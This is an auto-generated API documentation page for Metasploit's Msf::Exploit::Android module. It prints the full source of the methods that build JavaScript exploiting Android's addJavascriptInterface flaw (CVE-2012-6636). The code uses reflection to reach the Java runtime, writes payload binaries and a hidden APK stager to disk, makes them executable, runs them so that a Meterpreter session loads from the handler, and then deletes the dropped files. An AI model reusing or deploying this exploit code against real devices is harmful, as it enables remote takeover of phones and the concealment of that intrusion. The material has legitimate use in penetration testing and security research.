metasploit-gs/api/Msf/Exploit/Android.html

<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
  Module: Msf::Exploit::Android
  
    &mdash; Documentation by YARD 0.9.37
  
</title>

  <link rel="stylesheet" href="../../css/style.css" type="text/css" />

  <link rel="stylesheet" href="../../css/common.css" type="text/css" />

<script type="text/javascript">
  pathId = "Msf::Exploit::Android";
  relpath = '../../';
</script>


  <script type="text/javascript" charset="utf-8" src="../../js/jquery.js"></script>

  <script type="text/javascript" charset="utf-8" src="../../js/app.js"></script>


  </head>
  <body>
    <div class="nav_wrap">
      <iframe id="nav" src="../../class_list.html?1"></iframe>
      <div id="resizer"></div>
    </div>

    <div id="main" tabindex="-1">
      <div id="header">
        <div id="menu">
  
    <a href="../../_index.html">Index (A)</a> &raquo;
    <span class='title'><span class='object_link'><a href="../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span>
     &raquo; 
    <span class="title">Android</span>
  
</div>

        <div id="search">
  
    <a class="full_list_link" id="class_list_link"
        href="../../class_list.html">

        <svg width="24" height="24">
          <rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
          <rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
          <rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
        </svg>
    </a>
  
</div>
        <div class="clear"></div>
      </div>

      <div id="content"><h1>Module: Msf::Exploit::Android
  
  
  
</h1>
<div class="box_info">
  

  
  
  
  
  

  

  
  <dl>
    <dt>Defined in:</dt>
    <dd>lib/msf/core/exploit/android.rb</dd>
  </dl>
  
</div>


  
    <h2>
      Constant Summary
      <small><a href="#" class="constants_summary_toggle">collapse</a></small>
    </h2>

    <dl class="constants">
      
        <dt id="SUPPORTED_ARCHES-constant" class="">SUPPORTED_ARCHES =
          <div class="docstring">
  <div class="discussion">
    
<p>Since the NDK stager is used, arch detection must be performed</p>


  </div>
</div>
<div class="tags">
  

</div>
        </dt>
        <dd><pre class="code"><span class='lbracket'>[</span> <span class='const'>ARCH_ARMLE</span><span class='comma'>,</span> <span class='const'>ARCH_MIPSLE</span><span class='comma'>,</span> <span class='const'>ARCH_X86</span> <span class='rbracket'>]</span></pre></dd>
      
        <dt id="DEFAULT_ARCH-constant" class="">DEFAULT_ARCH =
          <div class="docstring">
  <div class="discussion">
    
<p>Most android devices are ARM</p>


  </div>
</div>
<div class="tags">
  

</div>
        </dt>
        <dd><pre class="code"><span class='const'>ARCH_ARMLE</span></pre></dd>
      
        <dt id="NDK_FILES-constant" class="">NDK_FILES =
          <div class="docstring">
  <div class="discussion">
    
<p>Some of the default NDK build targets are named differently than msf’s builtin constants. This mapping allows the ndkstager file to be looked up from the msf constant.</p>


  </div>
</div>
<div class="tags">
  

</div>
        </dt>
        <dd><pre class="code"><span class='lbrace'>{</span>
  <span class='const'>ARCH_ARMLE</span>  <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>armeabi</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
  <span class='const'>ARCH_MIPSLE</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>mips</span><span class='tstring_end'>&#39;</span></span>
<span class='rbrace'>}</span></pre></dd>
      
    </dl>
  







  
    <h2>
      Instance Method Summary
      <small><a href="#" class="summary_toggle">collapse</a></small>
    </h2>

    <ul class="summary">
      
        <li class="public ">
  <span class="summary_signature">
    
      <a href="#add_javascript_interface_exploit_js-instance_method" title="#add_javascript_interface_exploit_js (instance method)">#<strong>add_javascript_interface_exploit_js</strong>(arch)  &#x21d2; Object </a>
    

    
  </span>
  
  
  
  
  
  
  

  
    <span class="summary_desc"><div class='inline'></div></span>
  
</li>

      
        <li class="public ">
  <span class="summary_signature">
    
      <a href="#linux_exe_js-instance_method" title="#linux_exe_js (instance method)">#<strong>linux_exe_js</strong>(arch)  &#x21d2; Object </a>
    

    
  </span>
  
  
  
  
  
  
  

  
    <span class="summary_desc"><div class='inline'></div></span>
  
</li>

      
        <li class="public ">
  <span class="summary_signature">
    
      <a href="#ndkstager-instance_method" title="#ndkstager (instance method)">#<strong>ndkstager</strong>(stagename, arch)  &#x21d2; Object </a>
    

    
  </span>
  
  
  
  
  
  
  

  
    <span class="summary_desc"><div class='inline'>
<p>The NDK stager is used to launch a hidden APK.</p>
</div></span>
  
</li>

      
        <li class="public ">
  <span class="summary_signature">
    
      <a href="#stager_js-instance_method" title="#stager_js (instance method)">#<strong>stager_js</strong>(arch)  &#x21d2; Object </a>
    

    
  </span>
  
  
  
  
  
  
  

  
    <span class="summary_desc"><div class='inline'></div></span>
  
</li>

      
    </ul>
  



  <div id="instance_method_details" class="method_details_list">
    <h2>Instance Method Details</h2>

    
      <div class="method_details first">
  <h3 class="signature first" id="add_javascript_interface_exploit_js-instance_method">
  
    #<strong>add_javascript_interface_exploit_js</strong>(arch)  &#x21d2; <tt>Object</tt> 
  

  

  
</h3><table class="source_code">
  <tr>
    <td>
      <pre class="lines">


20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55</pre>
    </td>
    <td>
      <pre class="code"><span class="info file"># File 'lib/msf/core/exploit/android.rb', line 20</span>

<span class='kw'>def</span> <span class='id identifier rubyid_add_javascript_interface_exploit_js'>add_javascript_interface_exploit_js</span><span class='lparen'>(</span><span class='id identifier rubyid_arch'>arch</span><span class='rparen'>)</span>
  <span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
    function exec(runtime, cmdArr) {
      var ch = 0;
      var output = &#39;&#39;;
      var process = runtime.exec(cmdArr);
      var input = process.getInputStream();

      while ((ch = input.read()) &gt; 0) { output += String.fromCharCode(ch); }
      return output;
    }

    function attemptExploit(obj) {
      // ensure that the object contains a native interface
      try { obj.getClass().forName(&#39;java.lang.Runtime&#39;); } catch(e) { return; }

      // get the pid
      var pid = obj.getClass()
                   .forName(&#39;android.os.Process&#39;)
                   .getMethod(&#39;myPid&#39;, null)
                   .invoke(null, null);

      // get the runtime so we can exec
      var runtime = obj.getClass()
                       .forName(&#39;java.lang.Runtime&#39;)
                       .getMethod(&#39;getRuntime&#39;, null)
                       .invoke(null, null);

      </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_payload'>payload</span><span class='period'>.</span><span class='id identifier rubyid_arch'>arch</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='const'>ARCH_DALVIK</span> <span class='op'>?</span> <span class='id identifier rubyid_stager_js'>stager_js</span><span class='lparen'>(</span><span class='id identifier rubyid_arch'>arch</span><span class='rparen'>)</span> <span class='op'>:</span> <span class='id identifier rubyid_linux_exe_js'>linux_exe_js</span><span class='lparen'>(</span><span class='id identifier rubyid_arch'>arch</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>

      return true;
    }

    for (i in top) { if (attemptExploit(top[i]) === true) break; }
  </span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span></pre>
    </td>
  </tr>
</table>
</div>
    
      <div class="method_details ">
  <h3 class="signature " id="linux_exe_js-instance_method">
  
    #<strong>linux_exe_js</strong>(arch)  &#x21d2; <tt>Object</tt> 
  

  

  
</h3><table class="source_code">
  <tr>
    <td>
      <pre class="lines">


91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112</pre>
    </td>
    <td>
      <pre class="code"><span class="info file"># File 'lib/msf/core/exploit/android.rb', line 91</span>

<span class='kw'>def</span> <span class='id identifier rubyid_linux_exe_js'>linux_exe_js</span><span class='lparen'>(</span><span class='id identifier rubyid_arch'>arch</span><span class='rparen'>)</span>
  <span class='id identifier rubyid_platform_list'>platform_list</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Module/PlatformList.html" title="Msf::Module::PlatformList (class)">PlatformList</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../Module/PlatformList.html#initialize-instance_method" title="Msf::Module::PlatformList#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Module/Platform.html" title="Msf::Module::Platform (class)">Platform</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Module/Platform/Linux.html" title="Msf::Module::Platform::Linux (class)">Linux</a></span></span><span class='rparen'>)</span>

  <span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
    var payloadData = &quot;</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_to_octal'>to_octal</span><span class='lparen'>(</span><span class='id identifier rubyid_payload'>payload</span><span class='period'>.</span><span class='id identifier rubyid_encoded_exe'>encoded_exe</span><span class='lparen'>(</span><span class='label'>arch:</span> <span class='id identifier rubyid_arch'>arch</span><span class='comma'>,</span> <span class='label'>platform:</span> <span class='id identifier rubyid_platform_list'>platform_list</span><span class='rparen'>)</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>\\\\0</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>&quot;;

    // get the process name, which will give us our data path
    // $PPID does not seem to work on android 4.0, so we concat pids manually
    var path = &#39;/data/data/&#39; + exec(runtime, [&#39;/system/bin/sh&#39;, &#39;-c&#39;, &#39;cat /proc/&#39;+pid.toString()+&#39;/cmdline&#39;]);
    var payloadPath = path + &#39;/</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;;

    // build the library and chmod it
    runtime.exec([&#39;/system/bin/sh&#39;, &#39;-c&#39;, &#39;echo -e &quot;&#39;+payloadData+&#39;&quot; &gt; &#39;+payloadPath]).waitFor();
    runtime.exec([&#39;chmod&#39;, &#39;700&#39;, payloadPath]).waitFor();

    // run the payload
    runtime.exec([&#39;/system/bin/sh&#39;, &#39;-c&#39;, payloadPath + &#39; &amp;&#39;]).waitFor();

    // delete dropped files
    runtime.exec([&#39;rm&#39;, payloadPath]).waitFor();
  </span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span></pre>
    </td>
  </tr>
</table>
</div>
    
      <div class="method_details ">
  <h3 class="signature " id="ndkstager-instance_method">
  
    #<strong>ndkstager</strong>(stagename, arch)  &#x21d2; <tt>Object</tt> 
  

  

  
</h3><div class="docstring">
  <div class="discussion">
    
<p>The NDK stager is used to launch a hidden APK</p>


  </div>
</div>
<div class="tags">
  

</div><table class="source_code">
  <tr>
    <td>
      <pre class="lines">


115
116
117
118
119</pre>
    </td>
    <td>
      <pre class="code"><span class="info file"># File 'lib/msf/core/exploit/android.rb', line 115</span>

<span class='kw'>def</span> <span class='id identifier rubyid_ndkstager'>ndkstager</span><span class='lparen'>(</span><span class='id identifier rubyid_stagename'>stagename</span><span class='comma'>,</span> <span class='id identifier rubyid_arch'>arch</span><span class='rparen'>)</span>
  <span class='id identifier rubyid_stager_file'>stager_file</span> <span class='op'>=</span> <span class='const'>File</span><span class='period'>.</span><span class='id identifier rubyid_join'>join</span><span class='lparen'>(</span> <span class='const'><span class='object_link'><a href="../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Config.html" title="Msf::Config (class)">Config</a></span></span><span class='period'>.</span><span class='id identifier rubyid_data_directory'><span class='object_link'><a href="../Config.html#data_directory-class_method" title="Msf::Config.data_directory (method)">data_directory</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>exploits</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>CVE-2012-6636</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="#NDK_FILES-constant" title="Msf::Exploit::Android::NDK_FILES (constant)">NDK_FILES</a></span></span><span class='lbracket'>[</span><span class='id identifier rubyid_arch'>arch</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_arch'>arch</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>libndkstager.so</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
  <span class='id identifier rubyid_data'>data</span> <span class='op'>=</span> <span class='const'>File</span><span class='period'>.</span><span class='id identifier rubyid_read'>read</span><span class='lparen'>(</span><span class='id identifier rubyid_stager_file'>stager_file</span><span class='comma'>,</span> <span class='label'>mode:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>rb</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
  <span class='id identifier rubyid_data'>data</span><span class='period'>.</span><span class='id identifier rubyid_gsub!'>gsub!</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PLOAD</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_stagename'>stagename</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
    </td>
  </tr>
</table>
</div>
    
      <div class="method_details ">
  <h3 class="signature " id="stager_js-instance_method">
  
    #<strong>stager_js</strong>(arch)  &#x21d2; <tt>Object</tt> 
  

  

  
</h3><table class="source_code">
  <tr>
    <td>
      <pre class="lines">


57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89</pre>
    </td>
    <td>
      <pre class="code"><span class="info file"># File 'lib/msf/core/exploit/android.rb', line 57</span>

<span class='kw'>def</span> <span class='id identifier rubyid_stager_js'>stager_js</span><span class='lparen'>(</span><span class='id identifier rubyid_arch'>arch</span><span class='rparen'>)</span>
  <span class='id identifier rubyid_stagename'>stagename</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>5</span><span class='rparen'>)</span>
  <span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
    // libraryData contains the bytes for a native shared object built via NDK
    // which will load the &quot;stage&quot;, which in this case is our android meterpreter stager.
    var libraryData = &quot;</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_to_octal'>to_octal</span><span class='lparen'>(</span><span class='id identifier rubyid_ndkstager'>ndkstager</span><span class='lparen'>(</span><span class='id identifier rubyid_stagename'>stagename</span><span class='comma'>,</span> <span class='id identifier rubyid_arch'>arch</span><span class='rparen'>)</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>\\\\0</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>&quot;;

    // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
    // another stager which loads android meterpreter from the msf handler.
    var stageData = &quot;</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_to_octal'>to_octal</span><span class='lparen'>(</span><span class='id identifier rubyid_payload'>payload</span><span class='period'>.</span><span class='id identifier rubyid_raw'>raw</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>\\\\0</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>&quot;;

    // get the process name, which will give us our data path
    // $PPID does not seem to work on android 4.0, so we concat pids manually
    var path = &#39;/data/data/&#39; + exec(runtime, [&#39;/system/bin/sh&#39;, &#39;-c&#39;, &#39;cat /proc/&#39;+pid.toString()+&#39;/cmdline&#39;]);
    var libraryPath = path + &#39;/lib</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>.so&#39;;
    var stagePath = path + &#39;/</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_stagename'>stagename</span><span class='embexpr_end'>}</span><span class='tstring_content'>.apk&#39;;

    // build the library and chmod it
    runtime.exec([&#39;/system/bin/sh&#39;, &#39;-c&#39;, &#39;echo -e &quot;&#39;+libraryData+&#39;&quot; &gt; &#39;+libraryPath]).waitFor();
    runtime.exec([&#39;chmod&#39;, &#39;700&#39;, libraryPath]).waitFor();

    // build the stage, chmod it, and load it
    runtime.exec([&#39;/system/bin/sh&#39;, &#39;-c&#39;, &#39;echo -e &quot;&#39;+stageData+&#39;&quot; &gt; &#39;+stagePath]).waitFor();
    runtime.exec([&#39;chmod&#39;, &#39;700&#39;, stagePath]).waitFor();

    // load the library
    runtime.load(libraryPath);

    // delete dropped files
    runtime.exec([&#39;rm&#39;, stagePath]).waitFor();
    runtime.exec([&#39;rm&#39;, libraryPath]).waitFor();
  </span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span></pre>
    </td>
  </tr>
</table>
</div>
    
  </div>

</div>

      <div id="footer">
  Generated on Fri May  8 17:01:10 2026 by
  <a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
  0.9.37 (ruby-3.1.5).
</div>

    </div>
  </body>
</html>